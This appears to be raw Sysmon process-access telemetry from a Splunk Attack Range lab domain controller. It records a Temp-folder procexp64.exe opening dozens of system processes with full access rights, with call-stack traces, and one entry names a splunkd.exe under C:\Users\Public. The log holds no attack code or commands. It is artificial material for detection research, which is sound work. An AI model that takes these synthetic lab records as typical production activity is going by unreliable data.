15:16:38.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790072Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790071Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790070Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790069Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790068Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790067Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790066Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790065Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790064Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790063Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790062Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790061Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790060Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790059Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790058Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790057Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790056Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790055Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790054Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790053Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790052Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790051Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790050Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790049Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790048Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790047Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790046Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790045Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790044Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790043Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790042Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790041Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790040Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790039Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790038Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790037Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790036Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 